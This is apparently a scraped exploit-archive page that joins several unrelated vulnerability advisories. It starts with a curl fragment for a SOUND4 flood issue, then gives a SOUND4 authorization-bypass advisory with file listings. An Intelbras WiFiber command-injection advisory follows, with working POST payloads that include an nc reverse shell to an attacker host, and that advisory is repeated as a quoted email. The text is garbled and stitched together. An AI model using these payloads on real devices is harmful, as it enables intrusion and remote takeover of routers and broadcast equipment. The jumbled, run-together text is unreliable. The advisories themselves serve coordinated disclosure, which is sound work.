ping -c 3 -W 5 %s> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=localhost&networkid=251"> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=localhost&networkid=251"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x ICMP Flood Attack

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an authorization bypass due to an insecure direct object reference vulnerability.

  
SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: FM/HD Radio Processing:  
                  Impact/Pulse/First (Version 2: 1.1/2.15)  
                  Impact/Pulse/First (Version 1: 2.1/1.69)  
                  Impact/Pulse Eco 1.16  
                  Voice Processing:  
                  BigVoice4 1.2  
                  BigVoice2 1.30  
                  Web-Audio Streaming:  
                  Stream 1.1/2.4.29  
                  Watermarking:  
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and  
stereo parts of the signal are processed separately to obtain perfect  
consistency in terms of both sound and level. Therefore, in moving  
reception, when the FM receiver switches from stereo to mono and back to  
stereo, the sound variations and changes in level are reduced by over 90%.  
In the SOUND4 IMPACT processing chain, the stereo expander can be used  
substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4  
PULSE gives clients the ultimate price - performance ratio, providing  
much more than just a processor. Flexible and powerful, it ensures perfect  
sound quality and full compatibility with radio broadcasting standards  
and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need  
in an FM/HD processor and sets the bar high both in terms of performance  
and affordability. Designed to deliver a sound of uncompromising quality,  
this tool gives you 2-band processing, a digital stereo generator and an  
IMPACT Clipper.

Desc: The application is vulnerable to insecure direct object references  
that occur when the application provides direct access to objects based  
on user-supplied input. As a result of this vulnerability attackers can  
bypass authorization and access the hidden resources on the system and  
execute privileged functionalities.

Tested on: Apache/2.4.25 (Unix)  
           OpenSSL/1.0.2k  
           PHP/7.1.1  
           GNU/Linux 5.10.43 (armv7l)  
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5723  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php

26.09.2022

--

(GET|POST) /** HTTP/1.1

/var/www/:  
----------

.SOUND4  
about.php  
actioninprogress.php  
broken_error.php  
cfg_filewatch.xml  
cfg_filewatch_specific.xml  
checklogin.php  
checkserver.php  
config.php  
datahandlerdlg.php  
descrxml.php  
dns.php  
downloads  
downloads.php  
fullrebootsystem.php  
global.php  
globaljs.php  
guifactorysettings.xml  
guixml.php  
guixml_error.php  
header.php  
images  
index.php  
isreboot.php  
jquery-3.2.1.min.js  
jquery-plugins  
jquery-ui-custom  
jquery-ui-i18n.js  
jquery-ui.css  
jquery-ui.js  
jquery.js  
jquery.ui.touch-punch.min.js  
killffmpeg.php  
linkandshare.php  
login.php  
logout.php  
monitor.php  
networkdiagnostic.php  
partialrebootsystem.php  
ping.php  
playercfg.xml  
rebootsystem.php  
restoreinprogress.php  
script.min.js  
secure.php  
serverinprogress.php  
settings.php  
setup.php  
setup_ethernet.php  
style.min.css  
traceroute.php  
upgrade  
upgrade.php  
upgradeinprogress.php  
uploaded_guicustomload.php  
uploaded_kantarlic.php  
uploaded_licfile.php  
uploaded_logo.php  
uploaded_presetfile.php  
uploaded_restorefile.php  
uploaded_upgfile.php  
validate_tz.php  
ws.min.js  
ws.php  
wsjquery-class.min.js  
www-data-handler.php

/usr/cgi-bin/:  
--------------

(GET|POST) /** HTTP/1.1

backup.cgi  
cgi-form-data  
downloadkantarlic.cgi  
ffmpeg.cgi  
frontpanel  
getlogs.cgi  
getlogszip.cgi  
guicustomsettings.cgi  
guicustomsettingsload.cgi  
guifactorysettings.cgi  
importpreset.cgi  
loghandler.php  
logo  
logoremove.cgi  
logoupload.cgi  
phptail.php  
printenv  
printenv.vbs  
printenv.wsf  
restore.cgi  
restorefactory.cgi  
test-cgi  
upgrade.cgi  
upload.cgi

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Authorization Bypass

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Tag

#acer